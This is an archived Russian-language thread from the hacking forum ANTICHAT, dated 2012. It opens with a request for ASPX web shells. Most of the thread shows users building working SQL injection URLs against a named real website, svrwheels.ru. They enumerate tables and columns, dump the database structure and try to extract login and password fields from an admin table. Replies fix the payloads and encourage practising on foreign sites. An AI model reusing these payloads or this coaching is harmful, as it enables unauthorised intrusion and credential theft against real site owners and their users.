ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.03.2012, 18:09
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Сообщение от qaz
qaz said:
короче такой вопрос, есть возможность залить файл на сервер через mysql на там работают файлы только с разширением aspx, я так понял php скрипт там работать небудет) как тогда быть? есть мож какие шеллы написаные на aspx? ))
|
|
|
19.03.2012, 18:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
так те ссылочки что оставил ettee уже не работают
|
|
|
|
19.03.2012, 18:55
|
|
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906
Репутация:
-14
|
|
Сообщение от qaz
qaz said:
так те ссылочки что оставил ettee уже не работают
|
|
|
|
19.03.2012, 18:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
та попробовать то можно но чем я заменю функцию
?
|
|
|
|
19.03.2012, 20:56
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018
Репутация:
0
|
|
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+
Как вывести все поля из этой таблицы?
В title ответ
|
|
|
|
19.03.2012, 20:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от foma9999
foma9999 said:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+
Как вывести все поля из этой таблицы?
В title ответ
Код:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x52726567696f6e7341646d696e73--+a
Где
0x52726567696f6e7341646d696e73 == RregionsAdmins в HEX.
|
|
|
|
19.03.2012, 21:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
183267
Репутация:
84
|
|
Сообщение от foma9999
foma9999 said:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,TABLE_NAME,3,4,5,6,7,8,9,10+FROM+ INFORMATION_SCHEMA.TABLES+LIMIT+51,1+--+
Как вывести все поля из этой таблицы?
В title ответ
Код:
Code:
http://www.svrwheels.ru
/index.php?pageId=-2+union+select+1,Group_concat%28column_name%29,3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.columns+Where+table_name=0x52726567696f6e7341646d696e73+--+
Ereee опередил...
|
|
|
|
19.03.2012, 21:09
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018
Репутация:
0
|
|
Сообщение от Ereee
Ereee said:
Код:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,group_concat(COLUMN_NAME),3,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x52726567696f6e7341646d696e73--+a
Где
0x52726567696f6e7341646d696e73 == RregionsAdmins в HEX. Спасибо!
А как вывести структуру бд?
как тут http://i.imgur.com/5e1qH.png
UPD:
Почему
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,pass,login,4,5,6,7,8,9,10+FROM+0x 52726567696f6e7341646d696e73+--+
ничего не выводит, кроме ошибки? Что не так?
|
|
|
|
19.03.2012, 21:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Структура:
Код:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,(select%20@pro%20from%20(%20select%20@pro:=0x2727,%20(select%20null%20from%20information_schema.tables%20where%20concat(table_schema,0x2e,table_name)%20not%20in(%20@pro:=concat(@pro,0x2c27,table_schema,0x2e,table_name,0x27))limit%200,1))f),3,4,5,6,7,8,9,10--+a
По-твоему вопросу:
1. Нельзя после FROM имя таблицы в hex переводит.
2. Твоя таблица в другой базе:
Код:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,concat(table_name,0x3a,table_schema),3,4,5,6,7,8,9,10+FROM+information_schema.tables+limit+51,1--+a
3. Тебе нужно потренироватся на буржуйских сайтах.
4. Пустая таблица:
Код:
Code:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,count(*),3,4,5,6,7,8,9,10+FROM+u261330_catalog.RregionsAdmins+limit+0,1--+a
В написано, что записей "0". |
|
|
|
19.03.2012, 21:26
|
|
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018
Репутация:
0
|
|
Сообщение от Ereee
Ereee said:
http://www.svrwheels.ru/index.php?pageId=-2+union+select+1,(select%20@pro%20from%20(%20selec t%20@pro:=0x2727,%20(select%20null%20from%20inform ation_schema.tables%20where%20concat(table_schema, 0x2e,table_name)%20not%20in(%20@pro:=concat(@pro,0 x2c27,table_schema,0x2e,table_name,0x27))limit%200 ,1))f),3,4,5,6,7,8,9,10--+a
что значит а после коммента?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
